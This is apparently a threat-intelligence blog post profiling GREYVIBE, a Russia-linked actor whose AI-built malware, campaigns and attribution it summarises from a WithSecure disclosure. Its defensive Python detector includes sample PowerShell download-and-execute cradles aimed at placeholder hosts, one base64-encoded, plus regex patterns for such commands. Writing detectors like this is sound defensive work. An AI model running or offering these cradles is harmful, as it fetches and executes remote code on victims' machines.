GREYVIBE Is The First Russia-Linked Threat Actor Whose Malware Toolkit Was Built With ChatGPT, Ideogram, And Gemini. WithSecure Disclosed Today. Five Campaigns, Three Malware Families.
- Patrick Duggan
- 1 minute ago
- 7 min read
WithSecure published a comprehensive disclosure today on a previously undocumented Russia-linked threat actor they have been tracking since January 2026 under the name GREYVIBE. The disclosure landed with dual-source coverage at BleepingComputer and The Hacker News, with the substantive technical detail and the indicator-of-compromise pack hosted on GitHub. The group is conducting persistent cyberespionage operations against Ukrainian military, government, civilian, and corporate targets. The most significant detail in the disclosure is not the targeting profile or the attribution. It is the tooling. WithSecure documents GREYVIBE as the first publicly attributed Russia-linked operator group whose malware development pipeline visibly used ChatGPT, Ideogram AI, and Google Gemini to produce custom obfuscators and a PowerShell RAT framework that are now actively deployed in production against Ukrainian targets.
Our adversaries index returned zero prior hits on GREYVIBE when we cross-checked an hour ago. This is a net-new named actor entering the public threat-intelligence lexicon today. This post is our adversary profile.
The Five Campaigns
WithSecure separates GREYVIBE's operational pattern into five named campaigns. The names are the researchers'. Each campaign uses a distinct delivery mechanism appropriate to its target population.
PhantomMail is the spear-phishing arm. GREYVIBE uses Google Drive and 4sync shared-file links to deliver malicious archives that contain decoy PDFs alongside the malware staging components. The lure documents are tailored per target by the AI-assisted content pipeline, which gives the spear-phish payload a plausibility that the average mass-mailed phishing campaign does not achieve. The targeting is primarily military and government.
PhantomClick is the social-engineering arm focused on browser-tier compromise. The campaign uses fake CAPTCHA pages and ClickFix-style instruction sequences, with the lure pages impersonating Zoom and LAPAS — the latter being a Ukrainian post and parcel service the target population would recognize. The CAPTCHA prompts include fake Cloudflare verification overlays that further establish trust at the visual layer before the victim executes the malicious payload through copy-paste-to-Run-dialog tradecraft.
PrincessClub is the consumer-tier campaign. GREYVIBE operates fake Ukrainian dating websites that distribute FallSpy Android spyware against male targets and Windows malware against the same. The campaign uses AI-generated photographs of fictitious female personas to populate Telegram outreach accounts that drive prospects to the dating sites. The Telegram persona quality is high enough that conventional social-engineering detection at the chat layer does not catch the lure. The implication is direct. AI-generated personas have crossed the believability threshold for sustained one-to-one social engineering, not just bulk spam.
DroneLink is the affinity-fraud campaign. GREYVIBE runs fake Ukrainian military charity websites themed around FPV drone procurement — a high-emotional-salience donation category in Ukraine during sustained kinetic conflict. Visitors arriving at the charity pages receive malware staging through the donation forms.
Nebo is the credential-harvesting campaign aimed at Ukrainian military personnel directly. GREYVIBE operates fake login pages impersonating Russian military communications systems. The targeting hypothesis is that Ukrainian military personnel may attempt to access Russian-side systems for intelligence or operational reasons, and the fake-login surface harvests both credentials and probe traffic indicating which Ukrainian operators are attempting the access. The targeting is sophisticated because the campaign captures intent in addition to credentials.
The Three Malware Families
LegionRelay is GREYVIBE's flagship PowerShell remote access trojan. WithSecure describes its capabilities as file theft, screenshot capture, credential harvesting, and Remote Desktop setup for hands-on-keyboard follow-on activity. The PowerShell implementation is significant. PowerShell-based malware in 2026 remains effective against organizations that have not implemented PowerShell Constrained Language Mode or equivalent enterprise-tier mitigations, and it remains effective specifically because the language is the legitimate primary administration surface on every Windows endpoint, which makes detection at the script layer a continuous calibration challenge for defenders.
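As an added defender-side illustration of the PhantomClick copy-paste-to-Run-dialog chain and the script-layer detection problem described for LegionRelay, the following example detection logic (written for this post, not taken from WithSecure's report or IOC pack) scores constructed Sysmon-style process-creation events. The parent/child shape, the flag list and every command line are assumptions made for the example, and the encoded-command case shows why a detector has to decode `-EncodedCommand` before matching.

```python
import base64
import re

# Constructed Sysmon-style process-creation events (already parsed to tuples).
# Paths and command lines are assumptions made up for this example, not
# indicators from the WithSecure report.
EXPLORER, CMD = r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_CRADLE = base64.b64encode(  # -EncodedCommand takes base64 of UTF-16LE
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [  # (ParentImage, Image, CommandLine)
    # ClickFix shape: Run dialog (hosted by explorer.exe) spawns a hidden shell
    (EXPLORER, PS, 'powershell -nop -w hidden -ep bypass -c "iex (iwr http://verify.example.invalid/c.txt)"'),
    (EXPLORER, PS, f"powershell -enc {ENCODED_CRADLE}"),  # same shape, cradle hidden behind -enc
    (CMD, PS, "powershell.exe"),  # admin opening a shell from cmd.exe: benign
    (EXPLORER, PS, "powershell.exe"),  # Start-menu launch: parent alone must not alert
]
CRADLE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|"
                    r"downloadfile|net\.webclient|frombase64string)\b", re.I)
HIDING = re.compile(r"\s-(nop|noprofile|w(indowstyle)?\s+hidden|ep\s+bypass|"
                    r"executionpolicy\s+bypass|noni|noninteractive)\b", re.I)
ENCODED = re.compile(r"\s-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmd: str) -> str:
    """Recover the script passed via -EncodedCommand (base64 of UTF-16LE), or ''."""
    m = ENCODED.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le", errors="replace")
    except ValueError:
        return ""


def classify(parent_image: str, image_path: str, cmd: str) -> dict:
    parent = parent_image.rsplit("\\", 1)[-1].lower()
    image = image_path.rsplit("\\", 1)[-1].lower()
    decoded = decode_encoded_command(cmd)
    checks = [  # Win+R launches inherit explorer.exe as their parent process
        ("run-dialog-parent", parent == "explorer.exe" and image in ("powershell.exe", "pwsh.exe")),
        ("hidden-window-flags", bool(HIDING.search(cmd))),
        ("encoded-command", bool(decoded)),
        ("download-cradle", bool(CRADLE.search(cmd + " " + decoded))),  # scan decoded text too
    ]
    reasons = [name for name, hit in checks if hit]
    # The parent alone is noisy (Start menu), so require a second signal; a
    # download cradle is worth an alert from any parent.
    alert = "download-cradle" in reasons or ("run-dialog-parent" in reasons and len(reasons) > 1)
    return {"alert": alert, "reasons": reasons, "decoded": decoded}
```

Run `classify(*event)` over each tuple in `SAMPLE_EVENTS`: the two explorer.exe-parented hidden or encoded launches alert, the cmd.exe-parented shell and the plain Start-menu launch do not.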
PhantomRelay is the secondary PowerShell RAT. WithSecure documents its capability as system fingerprinting and dynamic script loading. The combination of functions is operationally telling. Fingerprinting plus dynamic loading is the shape of a reconnaissance-and-staging tool whose role in the kill chain is the second stage rather than the persistence layer. PhantomRelay is the tool the operator uses to figure out which deeper payload to send.
FallSpy is the Android spyware. Capabilities include contact list extraction, call log harvesting, location tracking, and broader device fingerprinting. FallSpy is distributed primarily through the PrincessClub dating-site arm. The Android footprint is the part of the GREYVIBE toolkit that survives if a victim's Windows endpoint is wiped, because mobile devices are not typically included in the incident response scope of a Ukrainian government or military victim's immediate breach response.
The Custom Obfuscators And The AI Pipeline
WithSecure identifies four custom obfuscators by name: LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP. These are not off-the-shelf packers. WithSecure documents that GREYVIBE developed them with AI-assisted coding workflows, meaning the operator population behind the campaign used ChatGPT, Gemini, or similar interactive code generation tools to iterate on the obfuscation logic. The implication is the same implication we wrote about yesterday in the Malware-Slop post and the day before in the State-Of-The-Supply-Chain pyramid. The operator population that uses AI to write malware is now visible in the in-the-wild reporting. The detector population that writes the signatures still works the way it has always worked. The asymmetric advantage is shifting toward the operators whose iteration loop is the AI-assisted-development loop, not the manual-development loop.
WithSecure also documents that GREYVIBE used Ideogram AI for visual content generation across the campaign lures — the dating site photos, the fake CAPTCHA branding, the charity-site iconography. The integration of multiple generative AI surfaces — text generation for code, text generation for lure copy, image generation for persona photos — into a single operator workflow is the part of the GREYVIBE disclosure that is going to age as the signature detail. Previous AI-malware coverage has focused on individual modalities. GREYVIBE is the first publicly attributed operator using the full multimodal stack as a coordinated production pipeline.
The Attribution Evidence
WithSecure's attribution to Russia rests on the standard evidence categories. Russian-language panels in the malware control infrastructure. Russian-language code comments in the malware source. Command-and-control servers configured to UTC plus three, which is Moscow time. Targeting patterns aligned with Russian state interests, specifically the Ukrainian military and government victim profile. The attribution confidence WithSecure reaches is consistent with state-aligned attribution, but WithSecure is precise about the layer of uncertainty.
The detail WithSecure raises that is worth dwelling on is the assessment that GREYVIBE "lacked the level of sophistication and operational discipline typically associated with mature nation-state actors." The OPSEC artifacts WithSecure observed include cryptocurrency mining deployment on some victim machines and possible connection to UAC-0098, the cybercriminal-aligned actor previously documented in Ukraine-conflict tradecraft. The cryptocurrency mining detail is operationally telling. State-aligned APTs do not typically deploy crypto-mining payloads on espionage targets because the mining traffic increases detection probability and the financial yield is trivially small relative to the operation's risk. The presence of mining on GREYVIBE victims suggests that some portion of the operator population is monetizing the access independently of the state-aligned mission, which is the recognizable shape of a hybrid criminal-cum-state actor or a state actor running a recruited criminal contractor pool.
The hybrid model has historical precedent in Russian-aligned cyber operations. The detail does not undermine the Russia attribution. It refines it. GREYVIBE is most plausibly a state-aligned operation conducted in part by recruited cybercriminal talent whose individual operators retain financial-incentive side projects on their assigned target estate. The implication for defenders is that the OPSEC sloppiness is real but the strategic mission is also real, and the two characteristics will continue to coexist across the operator population.
Why GREYVIBE Matters Beyond Ukraine
The campaign profile is Ukraine-focused today. The toolkit is not. LegionRelay is a generic PowerShell RAT that will work against any Windows endpoint with PowerShell enabled. FallSpy is a generic Android spyware that will work against any Android device. The obfuscators are generic. The AI-assisted-content pipeline is generic. The campaign architecture — spear-phishing, social-engineering ClickFix, affinity fraud, credential harvesting through fake login pages — is generic. The current targeting is geopolitically driven. The next targeting cycle is whatever the operator population chooses next.
The AI-tooling shape that WithSecure documents is the part defenders outside Ukraine need to absorb today, not next year. The pattern of operator workflow that GREYVIBE represents — multimodal AI for lure development plus AI-assisted malware coding plus a recruited talent pool with hybrid criminal-state motivations — is the operator workflow that the broader threat-actor population is going to converge on through 2026 and 2027 because the operator economics are obviously favorable. The pipeline is fast. The lure quality is high. The talent pool is deeper than the state-aligned talent pool alone. The OPSEC sloppiness that distinguishes GREYVIBE from a mature nation-state APT is a function of the recruitment model, not the tooling model, and the operator population will close the OPSEC gap as the iteration loop continues.
Our Adversary Profile Entry
We are filing GREYVIBE into our adversaries index with the following attribution. Country: Russia (suspected state sponsor). Attribution confidence: 80 (WithSecure's evidence is multi-source and consistent, though the hybrid-criminal element introduces uncertainty about which specific Russian state organ sponsors the operation). Synonyms: none yet established in the public reporting. Target countries: Ukraine. Target sectors: government, military, defense industrial base, civilian, business. Incident type: espionage with secondary criminal monetization. Named campaigns: PhantomMail, PhantomClick, PrincessClub, DroneLink, Nebo. Named malware: LegionRelay, PhantomRelay, FallSpy. Named obfuscators: LOOKVALPS, LOOKVALJS, DAYLIGHT, TEASOUP. Toolchain signature: multimodal generative AI (ChatGPT for code and copy, Ideogram for images, Gemini for additional content generation). Related actor: UAC-0098 (possible connection). References: WithSecure's disclosure, BleepingComputer's coverage, The Hacker News' coverage, the WithSecure GitHub IOC pack. The defender posture is the standard espionage-actor posture plus PowerShell-language-tier mitigations plus Android device inclusion in incident response scope plus an awareness that the operator's lure quality is now beyond what conventional content-detection heuristics catch.
The Adjacent Reads Today
We have published twice already today and once last night on supply-chain and AI-tooling adjacencies. The GREYVIBE disclosure sits inside the same broader frame. The trust paths and the AI-assisted production pipelines are reshaping the operator landscape faster than the detection layer is calibrating. The defender posture is the same posture we have been writing for two months. Audit the trust paths. Instrument the AI tooling. Treat AI-tool working directories as crown-jewel paths. Read the WithSecure disclosure in full when you have an hour. Pull their IOC pack. Cross-correlate against your own corpus. The receipts compound.
Five campaigns. Three malware families. Four custom obfuscators. One named actor entering the lexicon today. The pyramid keeps building.